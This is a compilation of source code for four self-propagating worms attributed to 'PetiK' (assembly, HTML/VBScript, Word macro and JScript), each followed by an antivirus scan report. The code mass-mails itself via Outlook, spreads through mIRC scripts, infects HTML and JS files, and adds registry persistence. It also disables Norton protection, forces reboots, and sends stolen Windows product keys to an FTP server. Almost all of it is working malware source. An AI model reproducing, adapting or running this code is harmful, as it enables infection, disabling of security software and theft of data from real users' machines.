szOrig db 50 dup (0)
szWin db 50 dup (0)
Buffer db 7Fh dup (0)
BufferSize dd 7Fh

run db "run",00h
windows db "windows",00h
Winini db "\\WIN.INI",00h
Copie db "\AVUpdate.exe",00h
filedat db "\Exclude.dat",00h
email db "wscript C:\send.vbs",00h
VBS db "C:\send.vbs",00h
mirc db "C:\Win.sys",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\Program Files\mirc\script.ini",00h
script4 db "C:\Program Files\mirc32\script.ini",00h
CLE db "Software\[PetiK]",00h
TITRE db "Install Information",00h
TEXTE db "Please reboot your computer to finish the installation",00h
CLE_RUN db "Software\Microsoft\Windows\CurrentVersion\Run",00h
NAV db "Norton Auto-Protect",00h
CLE_NOR db "\Software\Symantec\InstalledApps",00h
ValueType dd 00h
Value db "NAV",00h
CREE db "I-Worm.Mustard par PetiK (c)2001",00h
TITRE2 db "I-Worm.Mustard",00h
TEXTE2 db " Coded By PetiK (c)2001 ",0dh,0ah
db "",0dh,0ah
db "Small but Pretty",0dh,0ah
db "I Love You",0dh,0ah
db "Since January",0dh,0ah
db "I Think Of You",00h

HKEY_LOCAL_MACHINE equ 80000002h
HKEY_CURRNET_USER equ 80000001h
KEY_ALL_ACCESS equ 0000003Fh
FILE_ATTRIBUTE_READONLY equ 00000001h
FILE_ATTRIBUTE_HIDDEN equ 00000002h
FILE_ATTRIBUTE_NORMAL equ 00000080h
CREATE_NEW equ 00000001h
CREATE_ALWAYS equ 00000002h
OPEN_EXISTING equ 00000003h
FILE_SHARE_READ equ 00000001h
GENERIC_WRITE equ 40000000h
FILE_END equ 00000002h
EWX_REBOOT equ 00000002h
EWX_FORCE equ 00000004h

SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
SystemTime SYSTIME <>

mircd:
db "[script]",0dh,0ah
db "n0=on 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= ./dcc send $nick "
szCopie db 50 dup (0)
db "",0dh,0ah
db "n3=}",00h
MIRCTAILLE equ $-mircd

sendd:
db 'ENTREE()',0dh,0ah
db 'Sub ENTREE',0dh,0ah
db 'EMAIL()',0dh,0ah
db 'End Sub',0dh,0ah
db 'Sub EMAIL()',0dh,0ah
db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set N = K.CreateItem(0)',0dh,0ah
db 'N.To = P.Address',0dh,0ah
db 'N.Subject = "AntiVirus Update"',0dh,0ah
db 'N.Body = "The last version of your AV"',0dh,0ah
db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"AVUpdate.exe")',0dh,0ah
db 'N.DeleteAfterSubmit = True',0dh,0ah
db 'If N.To <> "" Then',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End Sub',0dh,0ah
SENDTAILLE equ $-sendd

datd:
db 02Ah,02Eh,076h,062h,073h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h ; "*.vbs" followed by padding
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,001h,0E6h,003h
DATTAILLE equ $-datd
.code
DEBUT:
VERIF: push offset regDisp
push offset regResu
push 00h
push 0F003Fh
push 00h
push 00h ; HKCU\Software\[PetiK] exist ?
push 00h
push offset CLE
push HKEY_CURRNET_USER
call RegCreateKeyExA
push [regResu]
call RegCloseKey
cmp [regDisp],1
jne EMAIL ; YES => EMAIL

COPIE: push 00h
call GetModuleHandleA
push 50
push offset szOrig
push eax
call GetModuleFileNameA
push 50
push offset szCopie
call GetWindowsDirectoryA
push offset Copie
push offset szCopie
call lstrcat
push offset szCopie
push offset szOrig
call CopyFileA ; Copy itself to \WINDIR\AVUpdate.exe
WIN_INI:push 50
push offset szWin
call GetWindowsDirectoryA
push offset Winini
push offset szWin
call lstrcat
push offset szWin ; Alters the run= line in the WIN.INI
push offset szCopie
push offset run
push offset windows ; run=\WINDIR\AVUpdate.exe
call WritePrivateProfileStringA
MIRC1: push 00h
push FILE_ATTRIBUTE_READONLY
push CREATE_ALWAYS
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset mirc
call CreateFileA
mov [FileHandle],eax
push 00h
push offset octets
push MIRCTAILLE
push offset mircd
push [FileHandle]
call WriteFile
push [FileHandle]
call CloseHandle ; Create a ini script for mIRC
MIRC2: push 00h
push offset script1
push offset mirc
call CopyFileA ; Copy to \mirc
push 00h
push offset script2
push offset mirc
call CopyFileA ; \mirc32
push 00h
push offset script3
push offset mirc
call CopyFileA ; \Program Files\mirc
push 00h
push offset script4
push offset mirc
call CopyFileA ; \Program Files\mirc32
push offset mirc
call DeleteFileA ; and delete the first file

DEL_REG:push offset RegHandle
push KEY_ALL_ACCESS
push 00h
push offset CLE_RUN
push HKEY_LOCAL_MACHINE
call RegOpenKeyExA

VAL1: push offset NAV ; Try to delete the "Norton Auto-Protect" value
push [RegHandle]
call RegDeleteValueA
test eax,eax
jnz EMAIL ; NO => jmp EMAIL

push [RegHandle]
call RegCloseKey
NORTON: push offset RegHandle
push 001F0000h
push 00h
push offset CLE_NOR
push HKEY_LOCAL_MACHINE
call RegOpenKeyExA
test eax,eax
jnz FIN
push offset BufferSize
push offset Buffer
push offset ValueType
push 00h ; Search the "InstallDir" of Norton
push offset Value
push RegHandle
call RegQueryValueExA

push [RegHandle]
call RegCloseKey

TRAFIC: push offset filedat
push offset Buffer
call lstrcat
push offset Buffer
call GetFileAttributesA
cmp eax,FILE_ATTRIBUTE_READONLY ; Attribute read only for the file ?
je FIN ; YES => FIN
push 00h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset Buffer
call CreateFileA
cmp eax,-1
je REBOOT ; File exist ? NO => jmp REBOOT
mov [FileHandle],eax
push FILE_END
push 00h
push [Dist]
push [FileHandle]
call SetFilePointer ; End of the file
push 00h
push offset octets
push DATTAILLE
push offset datd
push [FileHandle]
call WriteFile ; Write datas
push [FileHandle]
call CloseHandle

push 5000
call Sleep ; Wait 5 seconds
push FILE_ATTRIBUTE_READONLY
push offset Buffer
call SetFileAttributesA ; Attribute read only for the file

MESSAGE:push 40h
push offset TITRE
push offset TEXTE
push 00h
call MessageBoxA

REBOOT: push EWX_REBOOT or EWX_FORCE
call ExitWindowsEx

EMAIL: push 00h
push FILE_ATTRIBUTE_READONLY or FILE_ATTRIBUTE_HIDDEN
push CREATE_NEW
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset VBS
call CreateFileA ; Create the VBS mailer ; success ? continue
cmp eax,-1
je DATE ; else, jump to label DATE
mov [FileHandle],eax
push 00h
push offset octets
push SENDTAILLE
push offset sendd
push [FileHandle]
call WriteFile
push [FileHandle]
call CloseHandle
ENVOIE: push 01h
push offset email
call WinExec

ATTEND: push 10000
call Sleep

EFFACE: push offset VBS
call DeleteFileA

DATE: push offset SystemTime
call GetSystemTime
cmp [SystemTime.wDay],11h
jne FIN
cmp [SystemTime.wDay],06h
jne FIN
push 40h
push offset TITRE2
push offset TEXTE2
push 00h
call MessageBoxA

FIN: push 00h
call ExitProcess

end DEBUT
File Mustard.exe received on 05.16.2009 17:59:52 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 VBS.Lee.Based!IK
AhnLab-V3 5.0.0.2 2009.05.16 -
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.18
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!989a
Avast 4.8.1335.0 2009.05.15 Win32:Petik-Mustard
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.U
BitDefender 7.2 2009.05.16 Win32.Mustar.A@mm
CAT-QuickHeal 10.00 2009.05.15 W32.Petik.D
ClamAV 0.94.1 2009.05.16 Worm.Petik.d
Comodo 1157 2009.05.08 Worm.Win32.Petik.D
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.7168
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.7168.A
F-Prot 4.4.4.56 2009.05.16 W32/Malware!989a
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/PetTick.U@mm
GData 19 2009.05.16 Win32.Mustar.A@mm
Ikarus T3.1.1.49.0 2009.05.16 VBS.Lee.Based
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.18
Microsoft 1.4602 2009.05.16 Worm:Win32/Petik.D@mm
NOD32 4080 2009.05.15 Win32/Petik.D
Norman 6.01.05 2009.05.16 W32/Pet_Tick.7168
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.D
PCTools 4.4.2.0 2009.05.16 Worm.Petik
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.y
Sophos 4.41.0 2009.05.16 W32/Petik-D
Sunbelt 3.2.1858.2 2009.05.16 Worm.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.U
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 -

Additional information
File size: 7168 bytes
MD5...: 2aae09e21d35fd56f7aa0f603dcb6151
SHA1..: 4fbe3b2758bdb50ea45bb4593f074239c30bdd5d
<!--
Name : HTML.Embargo
Author : PetiK
Language : HTML/VBS

' Copies itself to %WINDIR%\WinHelp.htm
' Modifies AUTOEXEC.BAT to display a message in an endless loop
' Sets the Internet Explorer start page to the WinHelp.htm file
' Forces Internet Explorer into full-screen mode
' Spreads via mIRC (a script.ini that DCC-sends the file on channel join)
' Infects all HTM and HTML files in %WINDIR%\Web\Wallpaper
' If the day is the 5th or 17th, it adds cdplayer.exe, notepad.exe, etc. to the Run key
' and turns on a 60-second, password-protected screen saver
-->

<embargo>
<HTML><HEAD><TITLE>WinHelp</TITLE></HEAD>
<BODY bgColor=#ffffff>

<SCRIPT Language=VBScript>
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")

Set original=document.body.createTextRange
Set copie=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\WinHelp.htm")
copie.WriteLine "<embargo>"
copie.WriteLine "<HTML><HEAD><TITLE>WinHelp</TITLE></HEAD>"
copie.WriteLine "<BODY bgColor=#ffffff>"
copie.WriteLine original.htmltext
copie.WriteLine "</BODY></HTML>"
copie.Close()

reg=ws.RegRead("HKLM\Software\HTML.Embargo\")
If reg <> "c parti" Then
Set auto=fso.OpenTextFile("C:\autoexec.bat", 1, False, False)
tout=auto.ReadAll
Set nouveau= fso.CreateTextFile("C:\autoexec.bat", True, False)
nouveau.Write(tout)
nouveau.WriteLine ""
nouveau.WriteLine "@echo off"
nouveau.WriteLine ":embargo"
nouveau.WriteLine "cls"
nouveau.WriteLine "echo This is the signature of my new virus"
nouveau.WriteLine "echo."
nouveau.WriteLine "echo HTML.Embargo by PetiK"
nouveau.WriteLine "echo Made In France (c)2001"
nouveau.WriteLine "pause"
nouveau.WriteLine "goto embargo"
nouveau.Close()
ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",fso.GetSpecialFolder(0)&"\WinHelp.htm"
ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\FullScreen","yes"
ws.RegWrite "HKLM\Software\HTML.Embargo\","c parti"
End If

reg=ws.RegRead("HKLM\Software\HTML.Embargo\mirc")
If reg <> "c parti" Then
PFD=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If dossier = "" Then
If fso.FileExists("c:\mirc\mirc.ini") Then dossier = "c:\mirc"
If fso.FileExists("c:\mirc32\mirc.ini") Then dossier = "c:\mirc32"
If fso.FileExists(PFD & "\mirc\mirc.ini") Then dossier = PFD & "\mirc"
If fso.FileExists(PFD & "\mirc32\mirc.ini") Then dossier = PFD & "\mirc32"
End If
If dossier <> "" Then
Set script = fso.CreateTextFile(dossier & "\script.ini", True)
script.WriteLine "[script]"
script.WriteLine "n0=on 1:JOIN:#:{"
script.WriteLine "n1= /if ( $nick == &me ) (halt)"
script.WriteLine "n2= ./dcc send $nick " & fso.GetSpecialFolder(0)&"\WinHelp.htm"
script.WriteLine "n3=}"
ws.RegWrite "HKLM\Software\HTML.Embargo\mirc","c parti"
End If

Set FolderObj = fso.GetFolder(fso.GetSpecialFolder(0)&"\WEB\WallPaper")
Set FO = FolderObj.Files
For Each cible in FO
ext = lcase(fso.GetExtensionName(cible.Name))
If ext = "htm" or ext = "html" Then
Set vrai = fso.OpenTextFile(cible.path, 1, false)
If vrai.readline <> "<embargo>" Then
vrai.Close()
Set vrai = fso.OpenTextFile(cible.path, 1, false)
htmorg = vrai.ReadAll()
vrai.Close()
Set virus = document.body.createTextRange
Set vrai = fso.CreateTextFile(cible.path, True, False)
vrai.WriteLine(htmorg)
vrai.WriteLine ""
vrai.WriteLine virus.htmltext
vrai.Close()
Else
vrai.Close()
End If
End If
Next
End If

If Day(Now()) = 5 or Day(Now)) = 17 Then
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\CDPlayer",fso.GetSpecialFolder(0)&"\Cdplayer.exe"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NotePad",fso.GetSpecialFolder(0)&"\Notepad.exe"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PaintBrush",fso.GetSpecialFolder(0)&"\Pbrush.exe"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Explorer",fso.GetSpecialFolder(0)&"\Explorer.exe"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\RegEdit",fso.GetSpecialFolder(0)&"\Regedit.exe"
ws.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut","60"
ws.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveUsePassword", 01, "REG_DWORD"

document.Write "<font face='verdana' color=blue size='2'>Microsoft Internet Explorer<br>Please enabled ActiveX to see this page<br></font>"
</SCRIPT>
</BODY></HTML>
File Embargo.htm received on 05.16.2009 11:30:48 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 VBS.Embargo!IK
AhnLab-V3 5.0.0.2 2009.05.15 HTML/Petik
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.J
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Petik
Authentium 5.1.2.4 2009.05.15 VBS/Embargo.A
Avast 4.8.1335.0 2009.05.15 BV:KillAll
AVG 8.5.0.336 2009.05.15 VBS/Bother
BitDefender 7.2 2009.05.16 VBS.Embargo.A
CAT-QuickHeal 10.00 2009.05.15 VBS.Petik.J
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 Unclassified Malware
DrWeb 5.0.0.12182 2009.05.16 VBS.Generic.262
eSafe 7.0.17.0 2009.05.14 Email-Win32.Petik.j
eTrust-Vet 31.6.6508 2009.05.16 VBS/Both
F-Prot 4.4.4.56 2009.05.15 VBS/Embargo.A
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik.j
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.J!worm
GData 19 2009.05.16 VBS.Embargo.A
Ikarus T3.1.1.49.0 2009.05.16 VBS.Embargo
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik.j
McAfee 5616 2009.05.15 VBS/Ergo.intd
McAfee+Artemis 5616 2009.05.15 VBS/Ergo.intd
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.J
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.J
NOD32 4080 2009.05.15 VBS/Petik.J
Norman 6.01.05 2009.05.16 mIRC/Gen_HTM
nProtect 2009.1.8.0 2009.05.16 VBS.Embargo.A
Panda 10.0.0.14 2009.05.15 HTML/Embargo
PCTools 4.4.2.0 2009.05.15 VBS.Embargo.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 VBS.Petik.j
Sophos 4.41.0 2009.05.16 VBS/Ergo-A
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Embaro.A.Intd
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik.j
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 VBS.Embargo.A

Additional information
File size: 4085 bytes
MD5...: 4ec0004fb7f700df736ae4d3c2c22919
SHA1..: 464dec7db3865638af142f5e8929fcd49e5af667
' Worm Name : W97M.Maya.A
' Author : PetiK
' Language : VBA Word
' Date : May 29th – June 1st 2001
' Size : 33792 – 33280 (with change) bytes
'
' Changes the summary properties of the document (author, title, comments, keywords).
' If the value "W97M.Maya" does not exist under the key HKLM\Software\, the worm copies
' itself to C:\Windows\Maya.doc. It creates the "C:\Maya" directory with a TXT file and
' a script file to infect mIRC channels. Then it spreads with Microsoft Outlook
' (at most 500 recipients per address list).
' Subject : "Hi man, it's " + user name
' Body : "This is the new net Story"
' "It's great"
' Attachment : Maya.doc
' On the 5th of the month, when the document is closed, a message box appears.
' When the Visual Basic editor is opened, another message box appears and the worm
' adds a value to the Run key of the registry to disable the mouse.

Sub AutoOpen()
On Error Resume Next

With Dialogs(wdDialogFileSummaryInfo)
.Author = "PetiK"
.Title = "W97M.Maya"
.Comments = "To my best GirlFriend"
.Keywords = "Maya, Bzzbzz, to grow"
.Execute
End With

If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\", "W97M.Maya") <> "Par PetiK" Then

ActiveDocument.SaveAs FileName:="C:\Windows\Maya.doc"
ActiveDocument.Saved = True

FileSystem.MkDir "C:\Maya"
Open "C:\Maya\hello.txt" For Output As #1
Print #1, "Le 29 mai 2001 à Munster"
Print #1, "This is my first W97M.Outlook.Worm"
Print #1, "Its name is W97M.Maya"
Close #1
Open "C:\Maya\script.ini" For Output As #1
Print #1, "n0=on 1:JOIN:#:{"
Print #1, "n1= /if ( $nick == $me ) { halt }"
Print #1, "n2= /.dcc send $nick C:\Windows\Maya.doc"
Print #1, "n3=}"
Close #1
FileSystem.FileCopy "C:\Maya\script.ini", "C:\mirc\script.ini"
FileSystem.FileCopy "C:\Maya\script.ini", "C:\mirc32\script.ini"
FileSystem.FileCopy "C:\Maya\script.ini", "C:\progra~1\mirc\script.ini"
FileSystem.FileCopy "C:\Maya\script.ini", "C:\progra~1\mirc32\script.ini"
FileSystem.Kill "C:\Maya\script.ini"

System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\", "W97M.Maya") = "Par PetiK"
End If

Dim maya, bzzbzz, petik
Set maya = CreateObject("Outlook.Application")
Set bzzbzz = maya.GetNameSpace("MAPI")
If maya = "Outlook" Then
bzzbzz.Logon "profile", "password"
For mayacompte = 1 To bzzbzz.AddressLists.Count
Set AB = bzzbzz.AddressLists(mayacompte)
x = 1
Set petik = maya.CreateItem(0)
For compte = 1 To AB.AddressEntries.Count
verif = AB.AddressEntries(x)
petik.Recipients.Add verif
x = x + 1
If x > 500 Then compte = AB.AddressEntries.Count
Next compte
petik.Subject = "Hi man, it's " & Application.UserName
petik.Body = "This is the new net Story" + vbCrLf + "It's great"
petik.Attachments.Add ActiveDocument.FullName
petik.DeleteAfterSubmit = True
petik.Send
verif = ""
Next mayacompte
bzzbzz.Logoff
End If

End Sub
Sub AutoClose()
If Day(Now) = 5 Then
MsgBox "Coded by PetiK (c)2001", vbInformation, "W97M.Maya"
End If
End Sub

Sub ViewVBCode()
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "MayAttack") = "rundll32 mouse,disable"
MsgBox "Curiosity is bad" + vbCr + vbCr + "With her small size" + vbCr + "Maya is alwayas there", vbCritical, "W97M.Maya"
ShowVisualBasicEditor = True
End Sub
File Maya.doc received on 05.16.2009 17:59:46 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Melissa-based!IK
AhnLab-V3 5.0.0.2 2009.05.16 W97M/Unnamed
AntiVir 7.9.0.168 2009.05.15 W2000M/Ayam.A@mm
Antiy-AVL 2.0.3.1 2009.05.15 Virus/MSWord.MSWord
Authentium 5.1.2.4 2009.05.16 W97M/Ayam.A@mm
Avast 4.8.1335.0 2009.05.15 MW97:Ayam family
AVG 8.5.0.336 2009.05.15 BAT/Generic
BitDefender 7.2 2009.05.16 W97M.Ayam.A@mm
CAT-QuickHeal 10.00 2009.05.15 W97M.Prilissa
ClamAV 0.94.1 2009.05.16 W97M.Ayam.A
Comodo 1157 2009.05.08 Virus.MSWord.Melissabased
DrWeb 5.0.0.12182 2009.05.16 X97M.Papa
eSafe 7.0.17.0 2009.05.14 O97M.GNsm
eTrust-Vet 31.6.6508 2009.05.16 W97M/Ayam.A:mm
F-Prot 4.4.4.56 2009.05.16 W97M/Ayam.A@mm
F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Melissa-based
Fortinet 3.117.0.0 2009.05.16 W97M/Ayam.A@MM
GData 19 2009.05.16 W97M.Ayam.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Melissa-based
K7AntiVirus 7.10.737 2009.05.16 Macro.Melissa-based
Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Melissa-based
McAfee 5616 2009.05.15 W97M/Generic@MM
McAfee+Artemis 5616 2009.05.15 W97M/Generic@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Ayam.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Ayam.A@mm
NOD32 4080 2009.05.15 W97M/Ayam.A
Norman 6.01.05 2009.05.16 W97M/Ayam.A
nProtect 2009.1.8.0 2009.05.16 W97M.Ayam.A@mm
Panda 10.0.0.14 2009.05.16 W97M/Maya.Worm
PCTools 4.4.2.0 2009.05.16 WORD.97.Maya.B
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Macro.Office.Melissa-based.aa
Sophos 4.41.0 2009.05.16 WM97/Munster-A
Sunbelt 3.2.1858.2 2009.05.16 Virus.MSWord.Melissa-based (v)
Symantec 1.4.4.12 2009.05.16 W97M.OutlookWorm.Gen
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Sin
TrendMicro 8.950.0.1092 2009.05.15 W97M_AYAM.A
VBA32 3.12.10.5 2009.05.16 Virus.X97M.Papa
ViRobot 2009.5.15.1737 2009.05.15 W97M.Ayam.A
VirusBuster 4.6.5.0 2009.05.16 WORD.97.Maya.B

Additional information
File size: 33280 bytes
MD5...: ebe499343061e49ea4f31639fc3a7e59
SHA1..: 89de7abdbdc3fc8764d481a49125b8a3cebf6f05
// Name : JS.Germinal.A@mm
// Author : PetiK
// Date : June 1st – 2nd 2001
// Language : JScript
// Size of infection : 2357 bytes
// Action : It infects *.JS files in the current folder, \WINDOWS, \WINDOWS\DESKTOP
// and \WINDOWS\SAMPLES\WSH by prepending its own code (the first line is the marker).
// It writes the registered owner, organization, product ID/key and Windows version
// to a TXT file and uploads it to an FTP server with ftp.exe -s.

// JS.Germinal.A@mm
var WS=WScript.CreateObject("WScript.Shell")
var fso=WScript.CreateObject("Scripting.FileSystemObject")
var win=fso.GetSpecialFolder(0)
var c=fso.OpenTextFile(WScript.ScriptFullName,1)
var virus=c.ReadAll()

var dossier=new Array()
dossier[0]=fso.GetFolder(".")
dossier[1]=win
dossier[2]=win + "\\Desktop"
dossier[3]=win + "\\SAMPLES\\WSH"
for(i=0;i<4;i++){
infecte(dossier[i])
}
function infecte(dossier) {
var notredossier=fso.GetFolder(dossier)
var fichier=new Enumerator(notredossier.Files)
if(fso.GetExtensionName(fichier.item()).toUpperCase()=="JS") {
var victime=fso.OpenTextFile(fichier.item().path,1)
var marque=victime.Read(19)
var victimecode=marque+victime.ReadAll()
victime.Close()
if(marque!="// JS.Germinal.A@mm") {
var victime=fso.CreateTextFile(fichier.item().path,2)
victime.Write(virus+victimecode)
victime.Close()
}
}
}

WS.RegWrite ("HKLM\\Software\\","JS.Germinal Par PetiK 02/05/2001");
WS.RegWrite ("HKCU\\Software\\","JS.Germinal Par PetiK 02/05/2001");

var nom=WS.RegRead
("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOwner")
var org=WS.RegRead
("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOrganization")
var id=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ProductId")
var key=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ProductKey")
var ver=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Version")
var vernum=WS.RegRead
("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\VersionNumber")
var txt=fso.CreateTextFile("C:\\"+nom+".txt",2)
txt.WriteLine ("Information de " + nom + " à " + org);
txt.WriteLine ("");
txt.WriteLine ("Numéro d'identification : " + id);
txt.WriteLine ("Numéro de la clé : " + key);
txt.WriteLine ("Version de windows : " + ver + " " + vernum);
txt.Close()

var drv=fso.CreateTextFile(win+"\\PetiK.drv",2)
drv.WriteLine ("open");
drv.WriteLine ("members.aol.com");
drv.WriteLine ("pentasm99");
drv.WriteLine ("ascii")
drv.WriteLine ("put C:\\"+nom+".txt");
drv.WriteLine ("bye");
drv.WriteLine ("exit");
drv.Close()
WS.Run ("command.com /c ftp.exe -i -v -s:"+win+"\\PetiK.drv")

// Par PetiK 2nd June 2001


File Germinal.js received on 05.16.2009 11:58:21 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.JS.Germinal!IK
AhnLab-V3 5.0.0.2 2009.05.15 JS/Germinal
AntiVir 7.9.0.168 2009.05.15 JSC/Germinal.1
Antiy-AVL 2.0.3.1 2009.05.15 Virus/JS.JS
Authentium 5.1.2.4 2009.05.15 JS/Germinal.A
Avast 4.8.1335.0 2009.05.15 Unix:Malware-gen
AVG 8.5.0.336 2009.05.15 -
BitDefender 7.2 2009.05.16 JS.Germinal.A
CAT-QuickHeal 10.00 2009.05.15 JS_/Germinal
ClamAV 0.94.1 2009.05.15 JS.Germinal
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 JS.Optiz
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 JS/Germin
F-Prot 4.4.4.56 2009.05.15 JS/Germinal.A
F-Secure 8.0.14470.0 2009.05.15 Virus.JS.Germinal
Fortinet 3.117.0.0 2009.05.16 JS/GERMINAL.A
GData 19 2009.05.16 JS.Germinal.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.JS.Germinal
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Virus.JS.Germinal
McAfee 5616 2009.05.15 JS/Germinal
McAfee+Artemis 5616 2009.05.15 JS/Germinal
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Germinal.1
Microsoft 1.4602 2009.05.16 Trojan:JS/Germinal.A
NOD32 4080 2009.05.15 JS/Germinal.A
Norman 6.01.05 2009.05.16 JS/Germinal.B
nProtect 2009.1.8.0 2009.05.16 JS.Germinal.A
Panda 10.0.0.14 2009.05.16 -
PCTools 4.4.2.0 2009.05.15 JS.Germinal.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Script.Germinal.Trojan
Sophos 4.41.0 2009.05.16 JS/Germinal
Sunbelt 3.2.1858.2 2009.05.16 Virus.JS.Germinal (v)
Symantec 1.4.4.12 2009.05.16 JS.Lamnireg.A.Trojan
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 JS_GERMINAL.A
